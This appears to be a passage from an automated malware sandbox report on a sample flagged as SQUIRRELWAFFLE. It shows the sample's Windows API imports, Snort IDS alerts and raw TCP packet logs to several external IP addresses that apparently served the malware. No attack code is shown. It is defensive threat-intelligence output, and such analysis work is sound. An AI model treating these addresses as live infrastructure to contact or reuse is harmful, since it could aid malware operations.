                                          kernel32.dlllstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                          version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                          gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetTextColor, GetSystemPaletteEntries, GetStockObject, GetROP2, GetPixelFormat, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
                                          user32.dllCreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                          kernel32.dllSleep
                                          oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                          ole32.dllCoCreateInstance, CoUninitialize, CoInitialize
                                          oleaut32.dllCreateErrorInfo, GetErrorInfo, SetErrorInfo, SysFreeString
                                          comctl32.dllImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create

                                          Possible Origin

                                          Language of compilation systemCountry where language is spokenMap
                                          EnglishUnited States
                                          DutchNetherlands

                                          Network Behavior

                                          Snort IDS Alerts

                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                          09/27/21-20:25:48.418603TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049751107.180.44.125192.168.2.7
                                          09/27/21-20:25:48.418603TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049751107.180.44.125192.168.2.7
                                          09/27/21-20:25:49.168261TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049754107.180.44.125192.168.2.7
                                          09/27/21-20:25:49.168261TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049754107.180.44.125192.168.2.7
                                          09/27/21-20:25:49.976652TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049756107.180.44.125192.168.2.7
                                          09/27/21-20:25:49.976652TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049756107.180.44.125192.168.2.7
                                          09/27/21-20:25:51.413127TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049762107.180.44.125192.168.2.7
                                          09/27/21-20:25:51.413127TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049762107.180.44.125192.168.2.7
                                          09/27/21-20:25:52.245924TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049764107.180.44.125192.168.2.7
                                          09/27/21-20:25:52.245924TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049764107.180.44.125192.168.2.7
                                          09/27/21-20:25:52.950078TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049765107.180.44.125192.168.2.7
                                          09/27/21-20:25:52.950078TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049765107.180.44.125192.168.2.7
                                          09/27/21-20:25:53.840007TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049768107.180.44.125192.168.2.7
                                          09/27/21-20:25:53.840007TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049768107.180.44.125192.168.2.7
                                          09/27/21-20:25:54.640748TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049770107.180.44.125192.168.2.7
                                          09/27/21-20:25:54.640748TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049770107.180.44.125192.168.2.7
                                          09/27/21-20:25:55.383946TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049772107.180.44.125192.168.2.7
                                          09/27/21-20:25:55.383946TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049772107.180.44.125192.168.2.7
                                          09/27/21-20:25:56.286302TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049774107.180.44.125192.168.2.7
                                          09/27/21-20:25:56.286302TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049774107.180.44.125192.168.2.7
                                          09/27/21-20:25:56.965071TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049776107.180.44.125192.168.2.7
                                          09/27/21-20:25:56.965071TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049776107.180.44.125192.168.2.7
                                          09/27/21-20:25:57.677480TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049777107.180.44.125192.168.2.7
                                          09/27/21-20:25:57.677480TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049777107.180.44.125192.168.2.7
                                          09/27/21-20:25:58.440282TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049778107.180.44.125192.168.2.7
                                          09/27/21-20:25:58.440282TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049778107.180.44.125192.168.2.7
                                          09/27/21-20:25:59.538986TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049780107.180.44.125192.168.2.7
                                          09/27/21-20:25:59.538986TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049780107.180.44.125192.168.2.7
                                          09/27/21-20:26:01.207879TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049781107.180.44.125192.168.2.7
                                          09/27/21-20:26:01.207879TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049781107.180.44.125192.168.2.7
                                          09/27/21-20:26:01.898823TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049783107.180.44.125192.168.2.7
                                          09/27/21-20:26:01.898823TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049783107.180.44.125192.168.2.7
                                          09/27/21-20:26:02.676656TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049785107.180.44.125192.168.2.7
                                          09/27/21-20:26:02.676656TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049785107.180.44.125192.168.2.7
                                          09/27/21-20:26:03.402580TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049787107.180.44.125192.168.2.7
                                          09/27/21-20:26:03.402580TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049787107.180.44.125192.168.2.7
                                          09/27/21-20:26:04.129306TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049789107.180.44.125192.168.2.7
                                          09/27/21-20:26:04.129306TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049789107.180.44.125192.168.2.7
                                          09/27/21-20:26:04.856187TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049790107.180.44.125192.168.2.7
                                          09/27/21-20:26:04.856187TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049790107.180.44.125192.168.2.7
                                          09/27/21-20:26:05.596283TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049792107.180.44.125192.168.2.7
                                          09/27/21-20:26:05.596283TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049792107.180.44.125192.168.2.7
                                          09/27/21-20:26:05.829722UDP2018316ET TROJAN Zeus GameOver Possible DGA NXDOMAIN Responses53584988.8.8.8192.168.2.7
                                          09/27/21-20:26:06.359461TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049794107.180.44.125192.168.2.7
                                          09/27/21-20:26:06.359461TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049794107.180.44.125192.168.2.7
                                          09/27/21-20:26:07.106373TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049796107.180.44.125192.168.2.7
                                          09/27/21-20:26:07.106373TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049796107.180.44.125192.168.2.7
                                          09/27/21-20:26:07.873386TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049798107.180.44.125192.168.2.7
                                          09/27/21-20:26:07.873386TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049798107.180.44.125192.168.2.7
                                          09/27/21-20:26:08.534300TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049800107.180.44.125192.168.2.7
                                          09/27/21-20:26:08.534300TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049800107.180.44.125192.168.2.7
                                          09/27/21-20:26:09.234930TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049802107.180.44.125192.168.2.7
                                          09/27/21-20:26:09.234930TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049802107.180.44.125192.168.2.7
                                          09/27/21-20:26:09.906133TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049804107.180.44.125192.168.2.7
                                          09/27/21-20:26:09.906133TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049804107.180.44.125192.168.2.7
                                          09/27/21-20:26:10.603671TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049806107.180.44.125192.168.2.7
                                          09/27/21-20:26:10.603671TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049806107.180.44.125192.168.2.7
                                          09/27/21-20:26:11.326119TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049810107.180.44.125192.168.2.7
                                          09/27/21-20:26:11.326119TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049810107.180.44.125192.168.2.7
                                          09/27/21-20:26:12.021758TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049811107.180.44.125192.168.2.7
                                          09/27/21-20:26:12.021758TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049811107.180.44.125192.168.2.7
                                          09/27/21-20:26:12.714525TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049813107.180.44.125192.168.2.7
                                          09/27/21-20:26:12.714525TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049813107.180.44.125192.168.2.7
                                          09/27/21-20:26:13.383556TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049815107.180.44.125192.168.2.7
                                          09/27/21-20:26:13.383556TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049815107.180.44.125192.168.2.7
                                          09/27/21-20:26:14.036498TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049817107.180.44.125192.168.2.7
                                          09/27/21-20:26:14.036498TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049817107.180.44.125192.168.2.7
                                          09/27/21-20:26:14.689887TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049819107.180.44.125192.168.2.7
                                          09/27/21-20:26:14.689887TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049819107.180.44.125192.168.2.7
                                          09/27/21-20:26:15.382469TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049821107.180.44.125192.168.2.7
                                          09/27/21-20:26:15.382469TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049821107.180.44.125192.168.2.7
                                          09/27/21-20:26:15.999859TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049822107.180.44.125192.168.2.7
                                          09/27/21-20:26:15.999859TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049822107.180.44.125192.168.2.7
                                          09/27/21-20:26:16.725261TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049824107.180.44.125192.168.2.7
                                          09/27/21-20:26:16.725261TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049824107.180.44.125192.168.2.7
                                          09/27/21-20:26:17.462535TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049826107.180.44.125192.168.2.7
                                          09/27/21-20:26:17.462535TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049826107.180.44.125192.168.2.7
                                          09/27/21-20:26:18.880370TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049828107.180.44.125192.168.2.7
                                          09/27/21-20:26:18.880370TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049828107.180.44.125192.168.2.7
                                          09/27/21-20:26:20.649101TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049830107.180.44.125192.168.2.7
                                          09/27/21-20:26:20.649101TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049830107.180.44.125192.168.2.7
                                          09/27/21-20:26:21.332445TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049832107.180.44.125192.168.2.7
                                          09/27/21-20:26:21.332445TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049832107.180.44.125192.168.2.7
                                          09/27/21-20:26:22.027041TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049834107.180.44.125192.168.2.7
                                          09/27/21-20:26:22.027041TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049834107.180.44.125192.168.2.7
                                          09/27/21-20:26:22.728056TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049836107.180.44.125192.168.2.7
                                          09/27/21-20:26:22.728056TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049836107.180.44.125192.168.2.7
                                          09/27/21-20:26:23.500766TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049837107.180.44.125192.168.2.7
                                          09/27/21-20:26:23.500766TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049837107.180.44.125192.168.2.7
                                          09/27/21-20:26:24.136245TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049839107.180.44.125192.168.2.7
                                          09/27/21-20:26:24.136245TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049839107.180.44.125192.168.2.7
                                          09/27/21-20:26:25.857264TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049842103.28.36.212192.168.2.7
                                          09/27/21-20:26:25.857264TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049842103.28.36.212192.168.2.7
                                          09/27/21-20:26:27.115351TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049844103.28.36.212192.168.2.7
                                          09/27/21-20:26:27.115351TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049844103.28.36.212192.168.2.7
                                          09/27/21-20:26:28.680540TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049847103.28.36.212192.168.2.7
                                          09/27/21-20:26:28.680540TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049847103.28.36.212192.168.2.7
                                          09/27/21-20:26:29.898808TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049850103.28.36.212192.168.2.7
                                          09/27/21-20:26:29.898808TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049850103.28.36.212192.168.2.7
                                          09/27/21-20:26:31.158033TCP2033984ET TROJAN Possible SQUIRRELWAFFLE Server Response8049852103.28.36.212192.168.2.7
                                          09/27/21-20:26:31.158033TCP2033982ET TROJAN SQUIRRELWAFFLE Server Response8049852103.28.36.212192.168.2.7

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Sep 27, 2021 20:25:46.144481897 CEST4974680192.168.2.7185.67.1.94
                                          Sep 27, 2021 20:25:46.194699049 CEST8049746185.67.1.94192.168.2.7
                                          Sep 27, 2021 20:25:46.194859028 CEST4974680192.168.2.7185.67.1.94
                                          Sep 27, 2021 20:25:46.195082903 CEST4974680192.168.2.7185.67.1.94
                                          Sep 27, 2021 20:25:46.195147991 CEST4974680192.168.2.7185.67.1.94
                                          Sep 27, 2021 20:25:46.245747089 CEST8049746185.67.1.94192.168.2.7
                                          Sep 27, 2021 20:25:46.245790005 CEST8049746185.67.1.94192.168.2.7
                                          Sep 27, 2021 20:25:46.245901108 CEST4974680192.168.2.7185.67.1.94
                                          Sep 27, 2021 20:25:46.680944920 CEST4974780192.168.2.7162.215.253.14
                                          Sep 27, 2021 20:25:46.822916985 CEST8049747162.215.253.14192.168.2.7
                                          Sep 27, 2021 20:25:46.823003054 CEST4974780192.168.2.7162.215.253.14
                                          Sep 27, 2021 20:25:46.823128939 CEST4974780192.168.2.7162.215.253.14
                                          Sep 27, 2021 20:25:46.823168993 CEST4974780192.168.2.7162.215.253.14
                                          Sep 27, 2021 20:25:46.963751078 CEST8049747162.215.253.14192.168.2.7
                                          Sep 27, 2021 20:25:46.965917110 CEST8049747162.215.253.14192.168.2.7
                                          Sep 27, 2021 20:25:46.965940952 CEST8049747162.215.253.14192.168.2.7
                                          Sep 27, 2021 20:25:46.966074944 CEST4974780192.168.2.7162.215.253.14
                                          Sep 27, 2021 20:25:47.246567011 CEST4974980192.168.2.7162.215.253.14
                                          Sep 27, 2021 20:25:47.386269093 CEST8049749162.215.253.14192.168.2.7
                                          Sep 27, 2021 20:25:47.386404991 CEST4974980192.168.2.7162.215.253.14
                                          Sep 27, 2021 20:25:47.386585951 CEST4974980192.168.2.7162.215.253.14
                                          Sep 27, 2021 20:25:47.386655092 CEST4974980192.168.2.7162.215.253.14
                                          Sep 27, 2021 20:25:47.527060032 CEST8049749162.215.253.14192.168.2.7
                                          Sep 27, 2021 20:25:47.528405905 CEST8049749162.215.253.14192.168.2.7
                                          Sep 27, 2021 20:25:47.528501987 CEST8049749162.215.253.14192.168.2.7
                                          Sep 27, 2021 20:25:47.528563976 CEST4974980192.168.2.7162.215.253.14
                                          Sep 27, 2021 20:25:47.839186907 CEST4975180192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:25:47.943042994 CEST8049751107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:25:47.943358898 CEST4975180192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:25:47.943732023 CEST4975180192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:25:47.943892956 CEST4975180192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:25:48.047760010 CEST8049751107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:25:48.086848974 CEST8049751107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:25:48.418602943 CEST8049751107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:25:48.418734074 CEST8049751107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:25:48.418809891 CEST8049751107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:25:48.418819904 CEST8049751107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:25:48.418885946 CEST4975180192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:25:48.418900013 CEST4975180192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:25:48.622606039 CEST497538080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:25:48.630883932 CEST4975480192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:25:48.740151882 CEST8049754107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:25:48.740442991 CEST4975480192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:25:48.740844011 CEST4975480192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:25:48.741065025 CEST4975480192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:25:48.747518063 CEST80804975323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:25:48.747824907 CEST497538080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:25:48.778862000 CEST497538080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:25:48.849224091 CEST8049754107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:25:48.891999006 CEST8049754107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:25:48.910649061 CEST80804975323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:25:48.910721064 CEST80804975323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:25:48.910866976 CEST80804975323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:25:48.910892963 CEST497538080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:25:48.911207914 CEST497538080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:25:49.037647963 CEST80804975323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:25:49.037811995 CEST497538080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:25:49.168261051 CEST8049754107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:25:49.168283939 CEST8049754107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:25:49.168427944 CEST4975480192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:25:49.450717926 CEST4975680192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:25:49.559809923 CEST8049756107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:25:49.560209990 CEST4975680192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:25:49.560353041 CEST4975680192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:25:49.560462952 CEST4975680192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:25:49.669806957 CEST8049756107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:25:49.710335970 CEST8049756107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:25:49.976651907 CEST8049756107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:25:49.977117062 CEST8049756107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:25:49.977582932 CEST4975680192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:25:50.887948990 CEST4976280192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:25:50.992923021 CEST8049762107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:25:50.993057013 CEST4976280192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:25:51.025165081 CEST4976280192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:25:51.025198936 CEST4976280192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:25:51.130487919 CEST8049762107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:25:51.169555902 CEST8049762107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:25:51.413126945 CEST8049762107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:25:51.413139105 CEST8049762107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:25:51.413295031 CEST4976280192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:25:51.523477077 CEST497538080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:25:51.648474932 CEST80804975323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:25:51.649390936 CEST80804975323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:25:51.649904966 CEST497538080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:25:51.725169897 CEST4976480192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:25:51.775139093 CEST80804975323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:25:51.775542974 CEST497538080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:25:51.785351038 CEST497538080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:25:51.829341888 CEST8049764107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:25:51.829545975 CEST4976480192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:25:51.829639912 CEST4976480192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:25:51.829648018 CEST4976480192.168.2.7107.180.44.125
                                          Sep 27, 2021 20:25:51.910505056 CEST80804975323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:25:51.911261082 CEST80804975323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:25:51.911278963 CEST80804975323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:25:51.911346912 CEST80804975323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:25:51.911418915 CEST80804975323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:25:51.911439896 CEST80804975323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:25:51.911465883 CEST497538080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:25:51.911583900 CEST80804975323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:25:51.911622047 CEST497538080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:25:51.912022114 CEST80804975323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:25:51.912035942 CEST80804975323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:25:51.912059069 CEST80804975323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:25:51.912074089 CEST80804975323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:25:51.912086964 CEST497538080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:25:51.912723064 CEST497538080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:25:51.932845116 CEST8049764107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:25:51.972791910 CEST8049764107.180.44.125192.168.2.7
                                          Sep 27, 2021 20:25:52.037686110 CEST80804975323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:25:52.037775993 CEST80804975323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:25:52.037795067 CEST80804975323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:25:52.037811995 CEST80804975323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:25:52.037914038 CEST497538080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:25:52.038033962 CEST497538080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:25:52.038280964 CEST80804975323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:25:52.038305044 CEST80804975323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:25:52.038322926 CEST80804975323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:25:52.038389921 CEST497538080192.168.2.723.82.140.206
                                          Sep 27, 2021 20:25:52.038398027 CEST80804975323.82.140.206192.168.2.7
                                          Sep 27, 2021 20:25:52.038418055 CEST80804975323.82.140.206192.168.2.7
